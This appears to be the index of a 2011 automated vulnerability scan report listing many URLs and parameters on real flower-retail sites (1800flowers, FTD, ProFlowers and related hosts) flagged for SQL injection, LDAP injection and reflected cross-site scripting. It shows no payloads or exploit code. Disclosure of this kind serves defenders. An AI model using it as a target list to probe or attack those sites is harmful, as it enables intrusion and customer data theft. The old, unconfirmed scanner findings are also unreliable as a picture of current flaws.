XSS, Open Redirection, Insecure Configuration, CWE-79, CAPEC-86, DORK, GHDB, 05092011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 07:41:14 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

1.2. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

1.3. http://ww30.1800flowers.com/deliverycalendarnew.do [month parameter]

1.4. http://ww30.1800flowers.com/product.do [CMAVID cookie]

1.5. http://ww30.1800flowers.com/shoppingbasket.do [brandCode cookie]

1.6. https://ww30.1800flowers.com/checkoutsignin.do [Referer HTTP header]

1.7. http://www.ftd.com/350/favicon.ico [REST URL parameter 1]

1.8. http://www.ftd.com/350/favicon.ico [REST URL parameter 2]

1.9. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 1]

1.10. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 2]

1.11. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 3]

1.12. http://www.ftd.com/351 [REST URL parameter 1]

1.13. http://www.ftd.com/351/favicon.ico [REST URL parameter 1]

1.14. http://www.ftd.com/351/favicon.ico [REST URL parameter 2]

1.15. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 1]

1.16. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 2]

1.17. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 3]

1.18. http://www.ftd.com/empty/index.epl [REST URL parameter 1]

1.19. http://www.ftd.com/empty/index.epl [REST URL parameter 2]

1.20. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 1]

1.21. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 2]

1.22. http://www.ftd.com/pics/counter.gif [REST URL parameter 1]

1.23. http://www.ftd.com/pics/counter.gif [REST URL parameter 2]

1.24. http://xcdn.xgraph.net/17572/ai/xg.gif [REST URL parameter 1]

2. LDAP injection

2.1. http://blooms.1800flowers.com/cm [ci parameter]

2.2. http://www.ftd.com/ [TLTSID cookie]

3. XPath injection

4. Cross-site scripting (reflected)

4.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn [REST URL parameter 9]

4.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn [REST URL parameter 9]

4.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ [REST URL parameter 9]

4.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF [REST URL parameter 9]

4.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF [REST URL parameter 9]

4.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF [REST URL parameter 9]

4.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF [REST URL parameter 9]

4.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF [REST URL parameter 9]

4.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF [REST URL parameter 9]

4.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF [REST URL parameter 9]

4.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF [REST URL parameter 9]

4.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF [REST URL parameter 9]

4.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF [REST URL parameter 9]

4.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF [REST URL parameter 9]

4.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF [REST URL parameter 9]

4.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF [REST URL parameter 9]

4.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ [REST URL parameter 9]

4.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9]

4.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ [REST URL parameter 9]

4.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF [REST URL parameter 9]

4.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ [REST URL parameter 9]

4.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF [REST URL parameter 9]

4.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQ [REST URL parameter 9]

4.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF [REST URL parameter 9]

4.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF [REST URL parameter 9]

4.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PF [REST URL parameter 9]

4.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ [REST URL parameter 9]

4.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ [REST URL parameter 9]

4.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ [REST URL parameter 9]

4.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ [REST URL parameter 9]

4.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ [REST URL parameter 9]

4.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ [REST URL parameter 9]

4.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ [REST URL parameter 9]

4.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ [REST URL parameter 9]

4.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF [REST URL parameter 9]

4.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9]

4.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF [REST URL parameter 9]

4.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF [REST URL parameter 9]

4.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m [REST URL parameter 9]

4.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF [REST URL parameter 9]

4.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF [REST URL parameter 9]

4.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF [REST URL parameter 9]

4.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF [REST URL parameter 9]

4.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF [REST URL parameter 9]

4.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF [REST URL parameter 9]

4.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ [REST URL parameter 9]

4.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9]

4.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF [REST URL parameter 9]

4.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF [REST URL parameter 9]

4.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF [REST URL parameter 9]

4.51. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF [REST URL parameter 9]

4.52. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF [REST URL parameter 9]

4.53. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF [REST URL parameter 9]

4.54. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF [REST URL parameter 9]

4.55. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF [REST URL parameter 9]

4.56. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF [REST URL parameter 9]

4.57. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF [REST URL parameter 9]

4.58. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9]

4.59. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF [REST URL parameter 9]

4.60. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF [REST URL parameter 9]

4.61. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF [REST URL parameter 9]

4.62. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF [REST URL parameter 9]

4.63. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF [REST URL parameter 9]

4.64. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF [REST URL parameter 9]

4.65. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PF [REST URL parameter 9]

4.66. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF [REST URL parameter 9]

4.67. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF [REST URL parameter 9]

4.68. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF [REST URL parameter 9]

4.69. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ [REST URL parameter 9]

4.70. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ [REST URL parameter 9]

4.71. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC [REST URL parameter 9]

4.72. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ [REST URL parameter 9]

4.73. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF [REST URL parameter 9]

4.74. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ [REST URL parameter 9]

4.75. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF [REST URL parameter 9]

4.76. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF [REST URL parameter 9]

4.77. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF [REST URL parameter 9]

4.78. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l [REST URL parameter 9]

4.79. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF [REST URL parameter 9]

4.80. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PF [REST URL parameter 9]

4.81. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF [REST URL parameter 9]

4.82. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF [REST URL parameter 9]

4.83. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF [REST URL parameter 9]

4.84. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b [REST URL parameter 9]

4.85. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b [REST URL parameter 9]

4.86. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b [REST URL parameter 9]

4.87. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b [REST URL parameter 9]

4.88. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b [REST URL parameter 9]

4.89. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b [REST URL parameter 9]

4.90. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]

4.91. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b [REST URL parameter 9]

4.92. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b [REST URL parameter 9]

4.93. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b [REST URL parameter 9]

4.94. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b [REST URL parameter 9]

4.95. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]

4.96. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ [REST URL parameter 9]

4.97. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ [REST URL parameter 9]

4.98. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ [REST URL parameter 9]

4.99. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]

4.100. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1 [REST URL parameter 9]

4.101. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ [REST URL parameter 9]

4.102. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ [REST URL parameter 9]

4.103. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ [REST URL parameter 9]

4.104. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ [REST URL parameter 9]

4.105. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1 [REST URL parameter 9]

4.106. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF [REST URL parameter 9]

4.107. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF [REST URL parameter 9]

4.108. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF [REST URL parameter 9]

4.109. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF [REST URL parameter 9]

4.110. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF [REST URL parameter 9]

4.111. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PF [REST URL parameter 9]

4.112. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PF [REST URL parameter 9]

4.113. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF [REST URL parameter 9]

4.114. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF [REST URL parameter 9]

4.115. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF [REST URL parameter 9]

4.116. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF [REST URL parameter 9]

4.117. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF [REST URL parameter 9]

4.118. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF [REST URL parameter 9]

4.119. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF [REST URL parameter 9]

4.120. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF [REST URL parameter 9]

4.121. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_l [REST URL parameter 9]

4.122. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PF [REST URL parameter 9]

4.123. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF [REST URL parameter 9]

4.124. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF [REST URL parameter 9]

4.125. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9]

4.126. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF [REST URL parameter 9]

4.127. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l [REST URL parameter 9]

4.128. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF [REST URL parameter 9]

4.129. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l [REST URL parameter 9]

4.130. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ [REST URL parameter 9]

4.131. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF [REST URL parameter 9]

4.132. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF [REST URL parameter 9]

4.133. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF [REST URL parameter 9]

4.134. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_l [REST URL parameter 9]

4.135. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF [REST URL parameter 9]

4.136. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF [REST URL parameter 9]

4.137. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF [REST URL parameter 9]

4.138. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF [REST URL parameter 9]

4.139. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF [REST URL parameter 9]

4.140. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF [REST URL parameter 9]

4.141. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF [REST URL parameter 9]

4.142. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF [REST URL parameter 9]

4.143. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF [REST URL parameter 9]

4.144. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF [REST URL parameter 9]

4.145. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF [REST URL parameter 9]

4.146. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1 [REST URL parameter 9]

4.147. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1 [REST URL parameter 9]

4.148. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ [REST URL parameter 9]

4.149. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ [REST URL parameter 9]

4.150. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ [REST URL parameter 9]

4.151. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ [REST URL parameter 9]

4.152. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ [REST URL parameter 9]

4.153. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF [REST URL parameter 9]

4.154. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF [REST URL parameter 9]

4.155. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF [REST URL parameter 9]

4.156. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF [REST URL parameter 9]

4.157. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF [REST URL parameter 9]

4.158. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l [REST URL parameter 9]

4.159. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m [REST URL parameter 9]

4.160. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF [REST URL parameter 9]

4.161. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l [REST URL parameter 9]

4.162. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l [REST URL parameter 9]

4.163. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn [REST URL parameter 9]

4.164. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b [REST URL parameter 9]

4.165. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b [REST URL parameter 9]

4.166. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]

4.167. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn [REST URL parameter 9]

4.168. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn [REST URL parameter 9]

4.169. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn [REST URL parameter 9]

4.170. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]

4.171. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx [trackingpgroup parameter]

4.172. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx [trackingpgroup parameter]

